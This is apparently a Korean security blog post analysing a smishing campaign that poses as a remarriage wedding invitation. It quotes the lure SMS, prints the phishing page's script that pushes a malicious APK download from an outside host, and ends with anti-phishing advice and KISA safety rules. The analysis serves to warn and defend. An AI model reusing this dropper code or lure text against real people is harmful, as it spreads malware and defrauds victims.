재혼 관련 청첩장 사칭 피싱 사이트(23.01.28)

지인 관련 스미싱인 재혼 관련 청첩장 사칭 피싱 사이트입니다.

해당 스미싱 문구는 지인 사칭으로 배포되고 있습니다. 지인 사칭 스미싱 문구는 결혼식, 돌잔치, 지인 행사, 부고 관련 메세지를 포함하여 보내고 있습니다. 해당 피싱 사이트는 재혼 관련 메세지를 사칭하여 스미싱 문구를 베포 합니다.
해당 건은 기존 청첩장과 스미싱 형태나 악성앱 형태가 유사 합니다. 문구를 보면 결혼식에서 재혼 쪽으로 바뀐 것을 알 수 있습니다. 

 

모르는 번호로 전화가 왔을때는 항상 꼼꼼히 확인하시셔서 피해 없으시길 바랍니다.

문구)

"[Web발신] 저희 [재혼] 합니다 말도 많고 탈도 많은 저희 커플 우여곡절 끝에
함께 이겨내기로 했습니다.
모든이의 축복 속에 잘살겠습니다.
참석하시어 축하해주세요
주소:http://URL"

---

피싱 사이트 접속 화면

해당 피싱 사이트는 접속후 클릭을 하게 되면 apk 파일이 다운하게 됩니다.

부고장 스미싱과 똑같이 문구에는 장소가 포함되지 않았기 때문에 피싱 페이지에서 열기 버튼을 누르면 확인할 수 있는 것처럼 접속한 사용자가 클릭하게 끔 유도하는 형태로 보입니다.

---

HTML 분석

해당 페이지는 청첩장 이미지를 보여주고, 클릭 시  악성앱을 다운로드 하게 됩니다.

<script>
        window.location = "ynwtuu://?install";

        function downAlert() {
            if (window.confirm("결혼식장 장소와 시간을 보기위하여 확인을눌러주세요.")) {
                
                const newTab = window.open('', '_parent');
                const downloadLink = document.createElement('a');
                downloadLink.href = '/app'; 
               downloadLink.setAttribute('download', '모바일 결혼.apk');
                newTab.document.body.appendChild(downloadLink);
                downloadLink.click(); 
                window.location = "ynwtuu://?install";
            } 
          

        }
        var $main = $('.preview-main');
        var css_obj = $main.data('css');
        $main.css('background-color', css_obj.backgroundColor);

        $('.J_prev').on('click', () => {
            tabPage(1)
        });
        $('.J_next').on('click', () => {
            tabPage(-1)
        });
        var wrapper = document.getElementById('wrapper');

        function tabPage(is_up) {
            wrapper.contentWindow.postMessage(is_up, '*');
        }
      

    </script><a href="https://go.appp.ooguy.com/app" download="모바일 결혼.apk"

 

이미지를 클릭 하면 "결혼식장 장소와 시간을 보기 위하여 확인을눌러주세요." 창이 뜨고, /app 페이지로 넘어가게 됩니다.

 

---

 

해당 스미싱 문자에 포함된 URL을 누르게되면 결혼식 초대장 피싱 사이트로 접속하게 되며, 페이지에 있는 이미지 클릭 시 특정 페이지로 넘어가게 되며, 최종적으로는 APK파일을 다운로드하게 됩니다. 해당 APK 파일은 악성 앱입니다.

 

---

요새 피싱 사이트를 잘 만들기 때문에 항상 SNS 나 SMS 등 문구를 잘 확인하시고, 개인정보 입력 요구 시에는 항상 한 번 더 생각하고, 정상 사이트인지 확인하시기 바랍니다.

검색 사이트에서 해당 회사나 기관들을 검색하시고, 검색 결과 대부분은 상위 페이지에 노출됩니다.

전화번호만 있는 경우 전화했을 때 앱 설치하라고 링크를 보내주는 건 거르시고 직접 앱 스토어에 들어가서 설치하시기 바랍니다.  항상 앱 설치 하실 때는 신뢰 가능한 원스토어나 플레이스토어 등을 이용하시는 게 좋습니다.

---

휴대전화 보안 그리고 악성 앱 제거 방법

KISA  스마트폰 안전 수칙 10 계명
 
① 의심스러운 애플리케이션 다운로드하지 않기
  
② 신뢰할 수 없는 사이트 방문하지 않기
  
③ 발신인이 불명확하거나 의심스러운 메시지 및 메일 삭제하기
  
④ 비밀번호 설정 기능을 이용하고 정기적으로 비밀번호 변경하기
  
⑤ 블루투스 등 무선인터페이스는 사용 시에만 켜놓기
  
⑥ 이상 증상이 지속될 경우 악성코드 감염 여부 확인하기
  
⑦ 다운로드한 파일은 바이러스 유무를 검사한 후 사용하기
  
⑧ PC에도 백신 프로그램을 설치하고 정기적으로 바이러스 검사하기
  
⑨ 스마트폰 플랫폼의 구조를 임의로 변경하지 않기
  
⑩ 운영체제 및 백신 프로그램을 항상 최신 버전으로 업데이트하기